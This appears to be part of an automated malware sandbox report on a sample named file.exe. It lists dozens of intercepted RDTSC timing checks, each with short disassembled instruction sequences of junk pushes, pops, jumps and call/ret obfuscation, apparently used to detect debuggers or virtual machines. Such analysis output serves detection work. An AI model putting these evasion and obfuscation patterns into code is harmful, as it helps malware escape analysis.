                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A3A4 second address: 79A3A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A3A8 second address: 79A3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jo 00007F402CC7E506h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79A3BA second address: 79A3CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F402CDD4F5Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79A452 second address: 79A485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F402CC7E506h 0x00000010 jnl 00007F402CC7E506h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F402CC7E50Fh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B431 second address: 79B4CE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F402CDD4F58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F402CDD4F58h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 and edi, 7FF59DAFh 0x0000002d je 00007F402CDD4F5Ch 0x00000033 sub ebx, dword ptr [ebp+122D29D7h] 0x00000039 jmp 00007F402CDD4F63h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007F402CDD4F58h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000018h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a mov edi, dword ptr [ebp+122D1C19h] 0x00000060 push 00000000h 0x00000062 jmp 00007F402CDD4F63h 0x00000067 xchg eax, esi 0x00000068 pushad 0x00000069 push ecx 0x0000006a push edi 0x0000006b pop edi 0x0000006c pop ecx 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79A60D second address: 79A611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B4CE second address: 79B4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79C3D5 second address: 79C45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c jno 00007F402CC7E508h 0x00000012 pop edi 0x00000013 nop 0x00000014 mov di, 1109h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F402CC7E508h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 call 00007F402CC7E50Dh 0x00000039 mov ebx, dword ptr [ebp+122D307Bh] 0x0000003f pop ebx 0x00000040 mov edi, dword ptr [ebp+122D2BB7h] 0x00000046 push 00000000h 0x00000048 jmp 00007F402CC7E512h 0x0000004d xchg eax, esi 0x0000004e push esi 0x0000004f pushad 0x00000050 jmp 00007F402CC7E50Ah 0x00000055 push ecx 0x00000056 pop ecx 0x00000057 popad 0x00000058 pop esi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jng 00007F402CC7E50Ch 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B6BD second address: 79B6C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79C45D second address: 79C461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79B6C1 second address: 79B6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79C61C second address: 79C62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F402CC7E50Bh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79FA30 second address: 79FA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79FBBE second address: 79FBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A1A95 second address: 7A1A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A1CF4 second address: 7A1CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A3C2E second address: 7A3C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A3C32 second address: 7A3C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A2D5D second address: 7A2D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A2D63 second address: 7A2E2D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnc 00007F402CC7E50Ah 0x00000013 nop 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov bh, ch 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov eax, dword ptr [ebp+122D1029h] 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F402CC7E508h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D19E1h], ebx 0x0000004a adc di, F330h 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ebp 0x00000054 call 00007F402CC7E508h 0x00000059 pop ebp 0x0000005a mov dword ptr [esp+04h], ebp 0x0000005e add dword ptr [esp+04h], 00000018h 0x00000066 inc ebp 0x00000067 push ebp 0x00000068 ret 0x00000069 pop ebp 0x0000006a ret 0x0000006b jmp 00007F402CC7E518h 0x00000070 jno 00007F402CC7E507h 0x00000076 nop 0x00000077 jmp 00007F402CC7E517h 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jnl 00007F402CC7E515h 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A5B18 second address: 7A5B1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A5B1C second address: 7A5B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A5B22 second address: 7A5B3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A60F0 second address: 7A60F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A60F5 second address: 7A6183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F402CDD4F56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F402CDD4F61h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F402CDD4F58h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1A1Dh], edx 0x00000034 push 00000000h 0x00000036 jmp 00007F402CDD4F5Bh 0x0000003b push 00000000h 0x0000003d call 00007F402CDD4F64h 0x00000042 pop ebx 0x00000043 or ebx, 130475F7h 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b jmp 00007F402CDD4F65h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A8560 second address: 7A8565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AA316 second address: 7AA358 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F402CDD4F56h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D2A97h] 0x00000015 push 00000000h 0x00000017 mov di, D822h 0x0000001b push 00000000h 0x0000001d mov bx, C0BEh 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 jmp 00007F402CDD4F67h 0x00000028 jp 00007F402CDD4F5Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AA358 second address: 7AA372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F402CC7E512h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AA372 second address: 7AA378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A9560 second address: 7A95D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+122D3176h], eax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F402CC7E508h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D35CDh], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+124546E2h], ebx 0x00000044 mov eax, dword ptr [ebp+122D0ED9h] 0x0000004a jmp 00007F402CC7E50Fh 0x0000004f push FFFFFFFFh 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F402CC7E510h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AA378 second address: 7AA37C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A95D1 second address: 7A95F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F402CC7E50Eh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AB2F3 second address: 7AB37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push ebx 0x00000007 jmp 00007F402CDD4F5Bh 0x0000000c pop ebx 0x0000000d nop 0x0000000e mov dword ptr [ebp+124546E2h], esi 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 mov ebx, dword ptr [ebp+122D2C27h] 0x0000001d pop edi 0x0000001e jmp 00007F402CDD4F66h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F402CDD4F58h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov edi, ebx 0x00000041 call 00007F402CDD4F5Fh 0x00000046 pop ebx 0x00000047 xchg eax, esi 0x00000048 push edx 0x00000049 jmp 00007F402CDD4F5Fh 0x0000004e pop edx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jp 00007F402CDD4F5Ch 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AB37B second address: 7AB37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AA53B second address: 7AA542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AA542 second address: 7AA54C instructions: 0x00000000 rdtsc 0x00000002 je 00007F402CC7E50Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AA54C second address: 7AA563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F402CDD4F5Ah 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AD8A0 second address: 7AD8A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B31E5 second address: 7B31F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CDD4F5Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B83F4 second address: 7B8410 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8410 second address: 7B8416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8416 second address: 7B8453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F402CC7E514h 0x00000010 jl 00007F402CC7E511h 0x00000016 jmp 00007F402CC7E50Bh 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jc 00007F402CC7E506h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8453 second address: 7B8457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8457 second address: 7B845D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B845D second address: 7B8472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F402CDD4F61h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8472 second address: 7B8488 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8597 second address: 7B85A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE9A0 second address: 7BE9A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE9A4 second address: 7BE9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE9AA second address: 7BE9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F402CC7E511h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE9C0 second address: 7BE9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F402CDD4F5Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE9D6 second address: 7BE9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007F402CC7E506h 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007F402CC7E506h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BD664 second address: 7BD687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F402CDD4F56h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F402CDD4F64h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BD687 second address: 7BD68D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE393 second address: 7BE39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE4E1 second address: 7BE51C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c jno 00007F402CC7E51Dh 0x00000012 jmp 00007F402CC7E50Fh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE64E second address: 7BE66B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F402CDD4F68h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE66B second address: 7BE679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE679 second address: 7BE6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CDD4F65h 0x00000009 popad 0x0000000a jno 00007F402CDD4F6Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE849 second address: 7BE84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BE84D second address: 7BE855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C52CB second address: 7C52FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E512h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F402CC7E510h 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7902AD second address: 7902D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F402CDD4F58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 43DB3AB2h 0x00000011 mov dx, bx 0x00000014 push 3FC2D4B0h 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F402CDD4F56h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7902D1 second address: 7902D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7903F4 second address: 7903FE instructions: 0x00000000 rdtsc 0x00000002 je 00007F402CDD4F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7903FE second address: 79044C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jmp 00007F402CC7E50Fh 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 pop edi 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F402CC7E508h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d jg 00007F402CC7E506h 0x00000033 mov edx, eax 0x00000035 nop 0x00000036 push edi 0x00000037 je 00007F402CC7E50Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79044C second address: 79045C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jl 00007F402CDD4F6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79045C second address: 790460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7904DD second address: 7904E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7904E3 second address: 790535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F402CC7E516h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F402CC7E511h 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 jmp 00007F402CC7E519h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790535 second address: 790539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790539 second address: 790548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ebx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790746 second address: 79074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79074A second address: 790750 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790750 second address: 790756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
